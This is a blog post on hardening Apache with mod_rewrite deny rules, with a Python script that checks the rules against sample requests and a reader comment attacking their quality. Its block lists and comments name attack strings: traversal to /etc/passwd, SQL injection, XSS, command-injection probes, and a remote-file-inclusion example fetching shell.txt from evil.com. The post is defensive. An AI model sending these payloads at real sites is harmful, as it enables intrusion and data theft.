Using mod_rewrite to harden Apache

Most installations of Apache come with the mod_rewrite module already built and enabled. If you are hosting on a shared hosting environment (i.e. you bought a generic web hosting package), you are limited to editing a file named .htaccess to set up the security rules for your website, and a few of the directives below (RewriteMap, SSLRandomSeed, SSLProtocol and TraceEnable) are not permitted in that file: Apache answers every request for that directory with a 500 error if it finds them there. In a dedicated hosting environment where you have full access to the server configuration file, httpd.conf, you can write global rules once for the whole server. Note, however, that mod_rewrite rules in the main server configuration are not automatically inherited by each website (also called a VirtualHost): every VirtualHost must say RewriteOptions Inherit, or on Apache 2.4.8 and later the main configuration can say RewriteOptions InheritDown.

If you are in control of a dedicated server, it is best practice to configure Apache with the most restrictive settings first and then grant particular accounts more flexibility as the need arises. The following guide provides sample mod_rewrite rules that block many of the common probes and attack strings aimed at Apache-hosted sites. I highly recommend reading the mod_rewrite documentation at http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html before applying these samples to a production system. As always, test the rules in a development environment first to make sure they behave as you expect: pattern-based filters like these can also block legitimate clients.

[php]# Sample Hardened Apache mod_rewrite Security Rules
# Ref: http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond
# Some sections were provided by Aung Khant, http://yehg.net
#
# Flags used below:
#   NC = 'nocase|NC'    (case-insensitive match)
#   OR = 'ornext|OR'    (combine this condition with the next one using OR)
#   L  = 'last|L'       (stop processing rules after this one)
#   F  = 'forbidden|F'  (answer 403 Forbidden; the substitution is ignored)
#
# Apache does not accept a trailing "# comment" on the same line as a
# directive, so every comment here sits on its own line.  Rules placed in
# the main server configuration are NOT inherited by a <VirtualHost>
# unless that VirtualHost says "RewriteOptions Inherit" (on Apache 2.4.8
# and later the main configuration can say "RewriteOptions InheritDown").

# This turns on the rewrite engine in Apache
RewriteEngine on

# Force a high level of SSL/TLS encryption
# SSLRandomSeed is valid only in the main server configuration and
# SSLProtocol only there or in a <VirtualHost>, never in .htaccess.
# SSLv2 and SSLv3 are switched off ("ALL +SSLv3" would enable the very
# protocol that needs restricting, and SSLv3 has been broken since
# POODLE).  The cipher list keeps only strong suites and drops the RC4
# and MEDIUM grades that the old Apache default string allowed.
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
SSLOptions +StrictRequire
SSLProtocol all -SSLv2 -SSLv3
SSLCipherSuite HIGH:!aNULL:!eNULL:!EXP:!LOW:!MD5:!RC4
</IfModule>

# This section reads a blacklist text file of referrers and redirects any
# request that arrives with one of them.  RewriteMap is valid only in the
# main server configuration or a <VirtualHost>, not in .htaccess.
# Each line of the text file is "key value": the key is the referrer URL
# exactly as it appears in the access log, the value is either "-" (send
# the visitor back to the referring page) or a URL to send them to instead:
#   http://www.example.com/bad/index.html   -
#   http://www.example.com/bad/index2.html  http://somewhere.example/
RewriteMap deflector txt:/etc/httpd/conf/blacklist.txt
RewriteCond %{HTTP_REFERER} !=""
RewriteCond ${deflector:%{HTTP_REFERER}} ^-$
RewriteRule ^.* %{HTTP_REFERER} [R,L]

RewriteCond %{HTTP_REFERER} !=""
RewriteCond ${deflector:%{HTTP_REFERER}|NOT-FOUND} !=NOT-FOUND
RewriteRule ^.* ${deflector:%{HTTP_REFERER}} [R,L]

# Reject the TRACE and TRACK methods (cross-site tracing).  TraceEnable
# off (Apache 2.0.55 and later) does the same job natively and is valid
# only in the main server configuration or a <VirtualHost>.
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
TraceEnable off

# Everything from here down to the final RewriteRule is ONE chain of
# conditions joined with [OR]: a request that matches any of them is
# denied.  Only the last condition may omit [OR], and the chain must end
# with a RewriteRule or the conditions have nothing to act on.  These are
# substring blacklists: they stop only the tools and payload fragments
# they name, and they also catch legitimate traffic that happens to
# contain one of the strings.

# Allow only the GET and POST methods
# 'Cos most vulnerability scanners use HEAD to hunt for buggy files.
# This also rejects HEAD and OPTIONS from browsers, caches and link
# checkers; drop the condition if that matters for your site.
RewriteCond %{REQUEST_METHOD} !^(GET|POST)$ [NC,OR]

# Ban non-GUI browsers (this also stops legitimate wget/lynx fetches)
RewriteCond %{HTTP_USER_AGENT} (lynx|wget) [NC,OR]

# Ban requests that carry no User-Agent at all
RewriteCond %{HTTP_USER_AGENT} ^$ [NC,OR]

# Known web vulnerability scanners
RewriteCond %{HTTP_USER_AGENT} (syhunt|sqlmap|WhatWeb|Netsparker|w3af|Nstalker|acunetix|qualys|nikto|wikto|pikto|pykto) [NC,OR]

# Random underground web exploit scanners.  Short entries such as
# "java", "perl", "curl", "scan", "kiss", "ass" and "hack" also match
# inside ordinary user agents (e.g. "Classic" contains "ass"); trim this
# list to what your own logs actually show.
RewriteCond %{HTTP_USER_AGENT} (javascript\:alert|0d\s0a|ZeW|SlimBrowser|drone|DataCha|SBIder|Shelob|MobileRunner|Microsoft\sOffice|Plesk|Itah|Mosill|Internet\sExplorer\s4\.01|al_viewer|NetSeer|MSFrontPage|Yandex|webcollage|lwp\-trivial|Isidorus|core\-project|\<script\>|Toata\sdragostea\smea\spentru\sdiavola|StackRambler|Firebat|Y\!J\-SRD|ZmEu|libwww|perl|java|curl|ruby|python|scan|kiss|ass|Morfeus|0wn|hack|h4x|h4x0r) [NC,OR]

# Denial-of-service tool, bulk downloaders and harvesters
RewriteCond %{HTTP_USER_AGENT} (ApacheBench) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (WWW\-Mechanize|revolt|Crawl|Mail\.Ru|Walker|sbide|findlinks|spide|Ace\sExplorer|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]

# Disable access to cgi-bins if not used
RewriteCond %{REQUEST_URI} ^/(cgi\.cgi|webcgi|cgi\-914|cgi\-915|bin|cgi|mpcgi|cgi\-bin|ows\-bin|cgi\-sys|cgi\-local|htbin|cgibin|cgis|scripts|cgi\-win|fcgi\-bin|cgi\-exe|cgi\-home|cgi\-perl|scgi\-bin)/ [NC,OR]

# Block out common attack strings in the query string.  The same filters
# can be applied to HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE,
# HTTP_FORWARDED and HTTP_ACCEPT.  %{QUERY_STRING} is matched as
# received (still percent-encoded), which is why both raw and encoded
# forms of each string are listed.

# Directory traversal, null byte injection, HTTP response splitting
RewriteCond %{QUERY_STRING} (\.\.\/|\.\.%2f|\.\.%5C|\.\.%252F|\.\.%255C|\.\.%u2215|%u002e%u002e%u2215|%252e%252e%252f|%00|\\x00|\\u00|%5C00|%09|%0D%0A) [NC,OR]

# SQL injection probing
RewriteCond %{QUERY_STRING} (\@\@version|CHR\(|CHAR\(|UNION%20SELECT|/select/|/union/|/insert/|/update/|/delete/) [NC,OR]
RewriteCond %{QUERY_STRING} (or|and)%20[0-9]=[0-9] [NC,OR]

# Remote / local file inclusion
# RFI: yoursite.com/?pg=http://evil.com/shell.txt?
# LFI: yoursite.com/?pg=/logs/access_log?
# The RFI condition fires only when the query string ends in "?"; the
# same include URL without it passes.
RewriteCond %{QUERY_STRING} =(https?|ftp)(://|%3a%2f%2f).*\?$ [NC,OR]
RewriteCond %{QUERY_STRING} (\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd|c:\\boot\.ini|c%3A\\boot\.ini|c:\/boot\.ini|c:%2Fboot\.ini|c%3A%2Fboot\.ini|c:boot\.ini|c%3Aboot\.ini) [NC,OR]

# PHP version probing (the PHP easter-egg query strings start with =PHP
# and reveal the installed version)
RewriteCond %{QUERY_STRING} ^=PHP [NC,OR]

# XSS probing
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} /XSS/ [NC,OR]

# PHP GLOBALS overriding
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP _REQUEST variable overriding
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [NC,OR]

# PHP command injection probing
# vuln.php?exec=uname -a;ls -al;whoami
# Last condition in the chain, so no [OR] here.
RewriteCond %{QUERY_STRING} (=|;)(uname%20-|ls%20-|whoami)

# Deny access.  [F] answers 403 Forbidden and ignores the substitution,
# so a friendly error page is chosen with ErrorDocument, not here:
#   ErrorDocument 403 /path/to/friendly_error.php
# (The internal request for that page passes through these rules as
# well, so a client blocked on its User-Agent still trips them and gets
# Apache's built-in 403 page instead.)
RewriteRule .* - [F,L]
#
# Alternatively, send them back to their own address:
# RewriteRule .* http://%{REMOTE_ADDR} [R=301,L]
[/php]
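The deny chain above can go wrong in two ways the regexes hide: a condition that never fires on the attack it names, and one that fires on traffic you wanted to serve. The following is an added example, not code from the original post or from the Apache project: it re-expresses a representative subset of the RewriteCond lines as Python regexes (RewriteCond is an unanchored PCRE search, and these patterns use nothing that Python's re module handles differently) and evaluates the whole [OR] chain over a handful of constructed requests, so the rule set can be checked offline before it is deployed. The request fields, the shortened user-agent list, the made-up ClassicBrowser user agent and the evil.example host are assumptions for illustration.

```python
"""Offline evaluation of a mod_rewrite [OR] deny chain.

Added example, not part of the original post.  A subset of the RewriteCond
lines is modelled as (name, variable, pattern, negated, nocase) tuples and
run over constructed requests to show what the chain blocks and what it
misses.  The user-agent list is shortened to the terms that make the point.
"""
import re
from typing import List, NamedTuple


class Request(NamedTuple):
    method: str   # %{REQUEST_METHOD}
    uri: str      # %{REQUEST_URI}
    query: str    # %{QUERY_STRING}, raw (still percent-encoded), as Apache sees it
    ua: str       # %{HTTP_USER_AGENT}


# Mirrors the RewriteCond lines: "!" in front of a pattern negates it, NC
# makes it case-insensitive, and every line but the last carries [OR].
CONDITIONS = [
    ("method not GET/POST",    "method", r"^(GET|POST)$", True, True),
    ("non-GUI browser",        "ua",     r"(lynx|wget)", False, True),
    ("empty User-Agent",       "ua",     r"^$", False, True),
    ("known vuln scanner",     "ua",     r"(sqlmap|w3af|acunetix|nikto|wikto)", False, True),
    ("generic tool/substring", "ua",     r"(libwww|perl|java|curl|ruby|python|scan|kiss|ass|hack)", False, True),
    ("DoS tool",               "ua",     r"(ApacheBench)", False, True),
    ("cgi directory",          "uri",    r"^/(cgi\-bin|cgi|scripts|fcgi\-bin)/", False, True),
    ("traversal/null/CRLF",    "query",  r"(\.\.\/|\.\.%2f|\.\.%5C|%00|%0D%0A)", False, True),
    ("SQL injection",          "query",  r"(\@\@version|CHR\(|CHAR\(|UNION%20SELECT)", False, True),
    ("SQL tautology",          "query",  r"(or|and)%20[0-9]=[0-9]", False, True),
    ("remote file inclusion",  "query",  r"=(https?|ftp)(://|%3a%2f%2f).*\?$", False, True),
    ("local file inclusion",   "query",  r"(\/access_log|boot\.ini|\/etc\/passwd|%2Fetc%2Fpasswd)", False, True),
    ("XSS",                    "query",  r"(\<|%3C).*script.*(\>|%3E)", False, True),
    ("GLOBALS override",       "query",  r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", False, True),
    # the last RewriteCond on the page carries no NC flag, so it is case-sensitive
    ("command injection",      "query",  r"(=|;)(uname%20-|ls%20-|whoami)", False, False),
]


def tripped_conditions(req: Request) -> List[str]:
    """Names of the conditions this request trips.  An empty list means the
    final RewriteRule would not fire and the request is served normally."""
    hits = []
    for name, var, pattern, negated, nocase in CONDITIONS:
        flags = re.IGNORECASE if nocase else 0
        matched = re.search(pattern, getattr(req, var), flags) is not None
        if matched != negated:  # a "!pattern" condition trips when it does NOT match
            hits.append(name)
    return hits


def is_blocked(req: Request) -> bool:
    """True if the [OR] chain fires, i.e. at least one condition trips."""
    return bool(tripped_conditions(req))


# Constructed sample requests, not real traffic.  The browser strings are
# made up; query strings are the raw, still-encoded values Apache matches.
BROWSER = "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
SAMPLES = {
    "normal page view":      Request("GET",  "/index.php", "page=home", BROWSER),
    "HEAD from a browser":   Request("HEAD", "/index.php", "", BROWSER),
    "RFI with trailing ?":   Request("GET",  "/index.php", "page=http://evil.example/shell.txt?", BROWSER),
    "RFI without ?":         Request("GET",  "/index.php", "page=http://evil.example/shell.txt", BROWSER),
    "LFI via traversal":     Request("GET",  "/index.php", "page=../../../../etc/passwd", BROWSER),
    "sqlmap tautology":      Request("GET",  "/item.php",  "id=1%20or%201=1", "sqlmap/1.4"),
    "cgi-bin probe":         Request("GET",  "/cgi-bin/test-cgi", "", BROWSER),
    "reflected XSS probe":   Request("GET",  "/search.php", "q=%3Cscript%3Ealert(1)%3C/script%3E", BROWSER),
    "browser named Classic": Request("GET",  "/", "", "Mozilla/5.0 (X11; Linux) ClassicBrowser/2.0"),
    "no User-Agent":         Request("GET",  "/", "", ""),
}


if __name__ == "__main__":
    for label, req in SAMPLES.items():
        hits = tripped_conditions(req)
        verdict = "BLOCKED" if hits else "allowed"
        print(f"{label:22s} {verdict:8s} {', '.join(hits)}")
```

Two things stand out in the output. The RFI condition fires only when the query string ends in "?", so the same include URL without it is served; and the substring "ass" in the user-agent list blocks any browser whose name happens to contain it, which is the false-positive class the longer list on the page is full of. Feed the script lines from your own access log before turning the rule set on.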

This is just a sample of what can be done to increase your security posture with Apache. By leveraging mod_rewrite in your main configuration file, you can raise the bar across all of your web sites and reduce the amount of "noise" in your log files. Keep in mind that blacklist filters like these stop only the tools and payloads they name, and they are no substitute for fixing the applications behind them. If you want to learn more about mod_rewrite, aka the Swiss Army Knife of URL manipulation, check out the link below, and let us know if you figure out something worth passing on!

http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html

Happy Hunting!

Rick Lawhorn, CISSP, CISA, CHP, CHSS

Rick has over 20 years of experience in information technology which includes an extensive security, compliance, privacy and legal background. Rick has served as the Chief Information Security Officer (CISO) for two Fortune 100 companies and served in information technology and security leadership roles within multiple law firms, Department of Energy and the National White Collar Crime Center. He has been published in numerous international and domestic security magazines and currently serves on several advisory boards for new, innovative security products. He can be reached at rick.lawhorn@mac.com.


  • Test

    Who the **** wrote that *** of script? Filter rules that make Apache crash, senseless security-by-obscurity filter rules and regular expression beginner's mistakes. Fix that or delete it, please.